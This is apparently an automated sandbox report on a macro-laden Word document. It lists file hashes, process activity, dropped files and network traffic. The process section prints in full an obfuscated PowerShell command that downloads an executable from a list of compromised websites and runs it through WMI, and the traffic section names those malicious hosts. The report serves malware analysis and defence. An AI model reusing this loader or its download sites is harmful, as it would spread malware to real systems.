File name:

1778a2ad2b4663a62510c1c6225e527eb051c0c0cea5165d95a3190aeaa2f7af

Full analysis: https://app.any.run/tasks/84cadf70-e3cd-47d6-b58c-e7da2c3e1a4d
Verdict: Malicious activity
Analysis date: December 13, 2024, 21:41:14
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Title: Aut., Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 28 16:28:00 2020, Last Saved Time/Date: Fri Dec 13 09:24:00 2024, Number of Pages: 1, Number of Words: 10450, Number of Characters: 59565, Security: 8
MD5:

203709D8654FE2CD3BDD52DDC47214F6

SHA1:

2B6AE51CC2C2656316C27BA372293666EA4DB299

SHA256:

1778A2AD2B4663A62510C1C6225E527EB051C0C0CEA5165D95A3190AEAA2F7AF

SSDEEP:

1536:jTvRHqWvF77NhXnqdbTGCmt4mB1ePS0/zM/aUcagb2ZBhmEd1yWHefzdoFWoUW6M:3RDd/NhaNsRgPv7xagb2Zv+nmLB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • May hide the program window using WMI (SCRIPT)

      • WINWORD.EXE (PID: 5004)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 4136)
    • Creates an object to access WMI (SCRIPT)

      • WINWORD.EXE (PID: 5004)
    • Creates a directory (POWERSHELL)

      • powershell.exe (PID: 4136)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 4136)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 4136)
    • Checks proxy server information

      • powershell.exe (PID: 4136)
    • Create files in a temporary directory

      • powershell.exe (PID: 4136)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4136)
    • Sends debugging messages

      • WINWORD.EXE (PID: 5004)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 4136)
    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 4136)
    • Reads the software policy settings

      • powershell.exe (PID: 4136)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification: Word 8.0
LanguageCode: English (US)
DocFlags: Has picture, 1Table, ExtChar
System: Windows
Word97: No
Title: Aut.
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: -
Software: Microsoft Office Word
CreateDate: 2020:10:28 16:28:00
ModifyDate: 2024:12:13 09:24:00
Security: Locked for annotations
CodePage: Windows Latin 1 (Western European)
Company: -
CharCountWithSpaces: 69876
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: Aut.
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
LastPrinted: 0000:00:00 00:00:00
RevisionNumber: 1
TotalEditTime: -
Words: 10450
Characters: 59565
Pages: 1
Paragraphs: 139
Lines: 496
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
125
Monitored processes
5
Malicious processes
0
Suspicious processes
2

Behavior graph

Click at the process to see the details
start svchost.exe winword.exe powershell.exe conhost.exe no specs ai.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
5004"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\Desktop\1778a2ad2b4663a62510c1c6225e527eb051c0c0cea5165d95a3190aeaa2f7af.doc /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
4136POwersheLL -ENCOD S E T - I T e M     ( " V " + " A r i A B L " + " E : p b A " )     ( [ T Y P E ] ( " { 2 } { 3 } { 0 } { 1 } " - f ' . i O . d ' , ' i R e C T O r Y ' , ' s y S t E ' , ' m ' )   ) ;       S e t - i t e m     ( ' v A ' + ' R ' + ' I a b l E : t s O ' )     (     [ t Y P E ] ( " { 5 } { 0 } { 1 } { 4 } { 2 } { 3 } "   - f ' M . ' , ' n e t . s e ' , ' o I n T M a N A g ' , ' E r ' , ' r v I c E p ' , ' s Y S T e ' ) )     ;   $ G t u 5 7 p _ = ( ( ' T z 4 c c ' + ' e ' ) + ' 2 ' ) ; $ A s 1 f i m g = $ U z 4 0 u 7 2   +   [ c h a r ] ( 6 4 )   +   $ J 7 u 9 f x o ; $ J _ 7 1 4 m q = ( ( ' F x o a ' + ' s ' ) + ' m 8 ' ) ;     $ P b A : : " C r ` e a T ` E D I R E C t ` O R y " ( $ H O M E   +   ( ( ' { 0 } V h 5 ' + ' f 1 k o { 0 } G ' + ' 0 ' + ' g ' + ' k g ' + ' 4 f { 0 ' + ' } ' )   - f   [ C h A r ] 9 2 ) ) ; $ F c s r a g f = ( ' U ' + ( ' f r ' + ' a 7 ' ) + ' c c ' ) ;     (     v A R i a B L e     ( ' T s ' + ' o ' )   - V a l U   ) : : " s E c ` U r i t Y ` P r o t O C ` O L "   =   ( ' T ' + ( ' l s ' + ' 1 2 ' ) ) ; $ I w 1 d i b m = ( ( ' G n 2 ' + ' 9 ' ) + ( ' s ' + ' 2 8 ' ) ) ; $ L _ a x g o b   =   ( ' Z q ' + ' 1 ' + ( ' c ' + ' e 8 ' ) ) ; $ E 5 s 9 x 7 p = ( ( ' D u ' + ' j ' ) + ' z ' + ( ' 7 ' + ' w 5 ' ) ) ; $ E 2 b i x p h = ( ' B ' + ( ' i ' + ' q a q ' ) + ' m _ ' ) ; $ N z j 4 u 4 j = $ H O M E + ( ( ( ' g d i ' + ' V ' + ' h 5 ' ) + ' f 1 ' + ' k o ' + ' g d ' + ( ' i G 0 g k ' + ' g 4 f ' ) + ( ' g d ' + ' i ' ) ) . " R ` e P L a ` c e " ( ( [ c h A r ] 1 0 3 + [ c h A r ] 1 0 0 + [ c h A r ] 1 0 5 ) , ' \ ' ) ) + $ L _ a x g o b + ( ' . e ' + ' x e ' ) ; $ L p u j 2 d z = ( ( ' V 5 ' + ' w ' ) + ( ' n i ' + ' b a ' ) ) ; $ C c e m 6 0 d = . ( ' n ' + ' e w - ' + ' o b j e c t ' )   N e t . W e b c l i e n T ; $ U s 9 x k h q = ( ( ( ' h t ' + ' t ' ) + ( ' p s : ' + ' ] [   ' ) + ' ( ' + ( ' 0 ' + '   h ' ) + ' u B ' + ( ' J   ' + ' [ ' + ' ]   [ ] w ] ' + ' [ ' ) + '   ' + ' ( ' + ' 0 ' + ( '   h u B ' + ' J   ' + ' [ ' ) + ( ' ] ' + '   [ ] ' ) + ( ' w s o ' + ' c i ' ) + ( ' a l ' + ' p l a ' ) + ' y ' + ' m ' + ( ( ' e d i a . c o m ] [   ' + ' ( ' + ' 0 ' ) ) + '   h ' + ( ' u ' + ' B J   [ ] ' ) + ( '   ' + ' [ ] w w ' ) + ( ' p - ' + ' c o n ' ) + ' t e ' + ( ( ' n t ] ' + ' [   ( 0   ' + ' h ' ) ) + ( ' u ' + ' B J   ' + ' [ ] ' ) + ( '   [ ] w ' + ' C ' + ' z j ' ) + ( ( ' ] [   ( ' + ' 0   h u ' + ' B ' ) ) + ' J ' + ( '   ' + ' [ ] ' + '   [ ] ' ) + ( ( ' w @ h t ' + ' t p : ] [   ' + ' ( 0   ' + ' h u ' + ' B ' ) ) + ' J   ' + ( ' [ ' + ' ]   [ ' ) + ( ' ] ' + ' w ] [ ' ) + ( ( '   ( 0 ' + '   h u B ' ) ) + ( ' J   [ ] ' + '   [ ] ' + ' w f ' ) + ( ' l o r u ' + ' m ' ) + ' g r ' + ' o ' + ( ' u ' + ' p s . n e ' + ' t ] ' ) + ( ( ' [   ' + ' ( ' ) ) + ( ' 0   h ' + ' u ' + ' B J ' + '   [ ]   [ ] ' + ' w m ' ) + ' y ' + ( ' s ' + ' i t e ' ) + ( ' ] ' + ' [   ' ) + ( ( ' ( 0   h ' + ' u ' + ' B ' ) ) + ( ' J ' + '   [ ]   [ ] ' + ' w C 0 ' ) + ( ' N ' + ' Y B d ' ) + ' ] ' + ' [ ' + ( ( '   ( 0 ' + '   ' ) ) + ( ' h ' + ' u B ' + ' J   [ ]   ' + ' [ ] w ' ) + ( ' @ ' + ' h t ' ) + ( ' t p ' + ' : ] [ ' ) + ( ( '   ( ' + ' 0 ' ) ) + ( '   ' + ' h u B J ' + '   [ ]   ' ) + ( ( ' [ ] w ] [   ' + ' ( 0   h u ' + ' B ' + ' J   ' ) ) + ( ' [ ]   [ ] ' + ' w d a e ' + ' g . s ' + ' u ' ) + ' ] [ ' + ( ( '   ( 0   ' + ' h ' + ' u B J ' ) ) + ( '   ' + ' [ ] ' ) + ( '   [ ' + ' ] w w ' + ' p ' ) + ( ' - c ' + ' o ' ) + ( ' n t ' + ' e n t ' + ' ] [ ' ) + ( ( '   ( 0   h ' + ' u B ' ) ) + ( ' J   ' + ' [ ' ) + ' ]   ' + ' [ ] ' + ( ' w i Y H ' + ' ] ' ) + ' [ ' + '   ' + ( ( ' ( 0   h ' + ' u ' + ' B ' ) ) + ' J ' + ( '   [ ' + ' ] ' ) + '   [ ' + ( ' ] ' + ' w @ ' ) + ( ' h t t ' + ' p ' + ' : ] [ ' ) + ( ( '   ( 0 ' + '   h ' ) ) + ( ' u B J ' + '   [ ] ' + '   [ ] ' ) + ( ( ' w ] [   ( 0   h u ' + ' B J ' + '   [ ] ' + '   [ ' ) ) + ( ' ] w t e r a ' + ' s ' + ' r ' + ' u m a h ' + ' k a ' ) + ( ' y ' + ' u ' + ' . c o m ] ' ) + ( ( ' [   ' + ' ( ' ) ) + ( ' 0   h u B J   ' + ' [ ' + ' ]   [ ] ' ) + ( ' w w p ' + ' - ' + ' a d ' ) + ' m i ' + ( ( ' n ] ' + ' [ ' + '   ( 0   h ' ) ) + ' u B ' + ( ' J ' + '   [ ' + ' ]   [ ] ' ) + ( ' w d H ' + ' e L E ' ) + ( ( ' ] ' + ' [   ( ' + ' 0   h ' ) ) + ( ' u ' + ' B J   ' ) + ' [ ' + ( ' ]   [ ' + ' ] ' ) + ' w @ ' + ' h t ' + ( ' t p : ' + ' ] ' ) + ( ( ' [ ' + '   ( 0 ' + '   h u ' ) ) + ( ' B J   ' + ' [ ] ' ) + '   ' + ( ' [ ' + ' ] w ' ) + ( ( ' ] [   ( ' + ' 0   h u B ' + ' J ' + '   [ ' + ' ]   [ ' ) ) + ' ] w ' + ' 9 0 ' + ( ' 4 y . c ' + ' o m ' + ' ] [ ' ) + ( ( '   ( ' + ' 0 ' + '   h u B J ' ) ) + '   ' + ' [ ' + ( ' ] ' + '   [ ' ) + ( ' ] w h o w ' + ' - ' + ' t ' ) + ( ( ' o ' + ' ] [   ( ' ) ) + ' 0   ' + ( ' h u ' + ' B J   [ ]   ' ) + ' [ ] ' + ' w ' + ( ' A 6 ' + ' ] [ ' ) + ( ( '   ( 0 ' + '   ' + ' h u B J   ' ) ) + ( ' [ ]   [ ' + ' ] w @ ' + ' h t t p : ' ) + ( ( ' ] ' + ' [   ( 0 ' ) ) + '   h ' + ( ' u B J ' + '   ' ) + ' [ ' + ' ] ' + '   [ ' + ' ] ' + ( ( ' w ] [ ' + '   ( ' ) ) + ( ' 0 ' + '   h ' ) + ' u ' + ( ' B ' + ' J   [ ' + ' ]   ' + ' [ ] w d i e t ' + ' e t i ' + ' c i e ' ) + ( ' n n ' + ' e - ' ) + ' t i ' + ( ' f f a ' + ' n y . c ' + ' o m ] [   ' ) + ( ( ' ( 0   ' + ' h ' ) ) + ( ' u ' + ' B J ' ) + ( '   [ ' + ' ]   [ ] ' ) + ( ' w w p - i n ' + ' c l ' + ' u ' ) + ' d ' + ' e ' + ( ( ' s ] ' + ' [   ( ' ) ) + ' 0   ' + ( ' h u ' + ' B ' ) + ( ' J   ' + ' [ ' ) + ( ' ] ' + '   [ ] ' ) + ' w ' + ' r ' + ( ' G ' + ' J a L ' ) + ( ' g 5 ' + ' ] [ ' ) + ( ( '   ' + ' ( 0 ' + '   h u B J   ' + ' [ ]   [ ] ' ) ) + ' w @ ' + ( ( ' h t t p : ] ' + ' [   ( ' + ' 0 ' + '   h ' ) ) + ( ( ' u B J   [ ]   [ ' + ' ] w ] [ ' + '   ' + ' ( 0   h ' ) ) + ' u B ' + ( ' J   [ ]   ' + ' [ ] ' + ' w d ' ) + ' o ' + ( ' t ' + ' a s a ' ) + ( ' r i ' + ' m . c o ' + ' m ] [ ' ) + ( ( '   ( ' ) ) + ( ' 0   h ' + ' u ' ) + ' B J ' + ( '   [ ' + ' ]   [ ] w w ' ) + ( ' p - ' + ' a d m i n ' + ' ] ' ) + ( ( ' [   ( 0 ' + '   h ' + ' u B J   [ ' ) ) + ( ' ]   [ ] ' + ' w ' ) + ' D ' + ( ( ' y z ] [ ' + '   ( 0 ' + '   h u B ' ) ) + ( ' J ' + '   [ ' ) + ( ' ]   [ ] w @ h t ' + ' t ' + ' p ' + ' s ' + ' : ] [ ' ) + '   ' + ' ( ' + ( ( ' 0   h u B J ' + '   [ ]   ' + ' [ ] w ] [ ' + '   ( 0   h ' + ' u ' ) ) + ( ' B J   ' + ' [ ] ' ) + '   ' + ( ' [ ] w ' + ' m o b ' ) + ( ' i s ' + ' - a u t o l ' ) + ' o a ' + ( ' n . c ' + ' o m ' ) + ' ] [ ' + ( ( '   ' + ' ( 0 ' ) ) + '   ' + ( ' h u ' + ' B J ' + '   [ ] ' ) + '   ' + ' [ ] ' + ( ' w w p - ' + ' c ' + ' o ' ) + ( ' n t ' + ' e ' ) + ( ' n ' + ' t ] [ ' ) + ( ( '   ' + ' ( 0   ' ) ) + ' h u ' + ' B ' + ( ' J   ' + ' [ ' ) + ' ]   ' + ' [ ' + ( ' ] w Y v q o B ' + ' s e ' + ' ] [ ' ) + ( ( '   ' + ' ( 0 ' ) ) + ( '   h u B ' + ' J   [ ' ) + ' ]   ' + ( ' [ ' + ' ] w ' ) ) ) . " R e p ` l ` A c e " ( ( ( ( ( ' ] [ ' + '   ( ' ) ) + ' 0 ' + ( '   h u ' + ' B ' ) + ( ' J   ' + ' [ ' ) + ( ' ]   [ ' + ' ] w ' ) ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x w ' + ' e ' ) ) [ 0 ] ) . " s p ` L i t " ( $ E u t l d y u   +   $ A s 1 f i m g   +   $ Q w 7 p p p e ) ; $ O i j r c v e = ( ' B r ' + ( ' o 5 ' + ' 5 5 ' ) + ' x ' ) ; f o r e a c h   ( $ C l _ i v 3 i   i n   $ U s 9 x k h q ) { t r y { $ C c e m 6 0 d . " D O W N L ` O a ` D f i L E " ( $ C l _ i v 3 i ,   $ N z j 4 u 4 j ) ; $ F b 7 7 5 z 9 = ( ( ' W 4 x ' + ' f ' ) + ( ' i ' + ' k g ' ) ) ; I f   ( ( & ( ' G e t ' + ' - I t e ' + ' m ' )   $ N z j 4 u 4 j ) . " l ` e n g T H "   - g e   3 8 4 5 1 )   { ( [ w m i c l a s s ] ( ' w i ' + ( ' n ' + ' 3 2 ' ) + ( ' _ P ' + ' r o ' ) + ( ' c e s ' + ' s ' ) ) ) . " C r ` E a T E " ( $ N z j 4 u 4 j ) ; $ U 5 a 3 u m v = ( ( ' L ' + ' j x k 1 ' ) + ' 9 4 ' ) ; b r e a k ; $ W h n u i _ 7 = ( ( ' N v k ' + ' 0 ' ) + ( ' _ ' + ' 6 4 ' ) ) } } c a t c h { } } $ Z d a a x j y = ( ' H ' + ( ' q n ' + ' q l r ' ) + ' f ' )  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4716\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3092"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "F2F20A3D-BF3B-44F5-98C1-0FBBF985E4D4" "CC5991D7-FA6C-40FB-8365-19906940AF60" "5004"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version:
0.12.2.0
Modules
Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
19 426
Read events
19 049
Write events
354
Delete events
23

Modification events

(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:0
Value:
017012000000001000B24E9A3E02000000000000000600000000000000
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5004
Operation:writeName:0
Value:
0B0E10DF0928D3A4CD484580198CF1826FE80B230046E1B88D85FCB4D3ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C5118C27D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ja-jp
Value:
2
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ko-kr
Value:
2
(PID) Process:(5004) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:pt-br
Value:
2
Executable files
24
Suspicious files
122
Text files
27
Unknown types
0

Dropped files

PID
Process
Filename
Type
5004WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A3VV9DEGWEUY2MIM7NNV.tempbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
5004WINWORD.EXEC:\Users\admin\AppData\Local\Temp\cabAE84.tmpcompressed
MD5:DA3380458170E60CBEA72602FDD0D955
SHA256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
5004WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RF138977.TMPbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
5004WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-msbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
4136powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_js3ax2i3.tsf.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5004WINWORD.EXEC:\Users\admin\Desktop\~$78a2ad2b4663a62510c1c6225e527eb051c0c0cea5165d95a3190aeaa2f7af.docbinary
MD5:773C183A2D91C0CB623B058ECAD4B978
SHA256:0CB0E960084FEA1D760955E29370D0D7A1835670AD2020B91D2AED032104E8E5
5004WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:7C3314D37461FE613AE081F0B4469112
SHA256:B1BC0FC8BC2BFFF84B385CE264835BCDF8A5BC8F2F1C8468EF1C9354D26DB177
4136powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2wrbbgh3.rkc.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5004WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbresbinary
MD5:5548FEBD2DB1C7A37F2BA08F1781C642
SHA256:C25CE5A8EF5985BF6725DAB8079BC9E474460CA677EBE6D1F18B00509BCD9385
5004WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:70E18E514B9B87B1E0FED46DCEC940C3
SHA256:049393F9043BB3AED43F676DEBCC1C194AF54A7EEB2E295645975D824F04F1DE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
82
TCP/UDP connections
93
DNS requests
27
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4136
powershell.exe
GET
301
145.239.37.162:80
http://www.dieteticienne-tiffany.com/wp-includes/rGJaLg5/
unknown
malicious
4136
powershell.exe
GET
301
92.255.111.71:80
http://daeg.su/wp-content/iYH/
unknown
malicious
4136
powershell.exe
GET
302
54.209.32.212:80
http://904y.com/how-to/A6/
unknown
shared
2356
svchost.exe
GET
200
23.48.23.169:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.169:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2356
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4136
powershell.exe
GET
301
145.239.37.162:80
http://dieteticienne-tiffany.com/wp-includes/rGJaLg5/
unknown
malicious
4136
powershell.exe
GET
301
92.255.111.71:80
http://daeg.su/wp-content/iYH
unknown
malicious
4712
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.48.23.52:443
https://omex.cdn.office.net/addinclassifier/officesharedentities
unknown
text
314 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2356
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
92.123.104.43:443
www.bing.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
5004
WINWORD.EXE
52.109.32.97:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
5004
WINWORD.EXE
23.48.23.43:443
omex.cdn.office.net
Akamai International B.V.
DE
whitelisted
5004
WINWORD.EXE
52.113.194.132:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.169:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 20.73.194.208
whitelisted
www.bing.com
  • 92.123.104.43
  • 92.123.104.30
  • 92.123.104.23
  • 92.123.104.63
  • 92.123.104.34
  • 92.123.104.33
  • 92.123.104.31
  • 92.123.104.21
  • 92.123.104.17
whitelisted
google.com
  • 142.250.185.238
whitelisted
officeclient.microsoft.com
  • 52.109.32.97
whitelisted
omex.cdn.office.net
  • 23.48.23.43
  • 23.48.23.45
  • 23.48.23.11
  • 23.48.23.55
  • 23.48.23.52
  • 23.48.23.66
  • 23.48.23.29
whitelisted
ecs.office.com
  • 52.113.194.132
whitelisted
crl.microsoft.com
  • 23.48.23.169
  • 23.48.23.194
  • 23.48.23.145
  • 23.48.23.143
  • 23.48.23.158
  • 23.48.23.147
  • 23.48.23.173
  • 23.48.23.167
  • 23.48.23.176
  • 23.48.23.164
whitelisted
messaging.lifecycle.office.com
  • 52.111.243.12
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
socialplaymedia.com
  • 173.255.194.250
malicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related
Potentially Bad Traffic
ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related
Process
Message
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.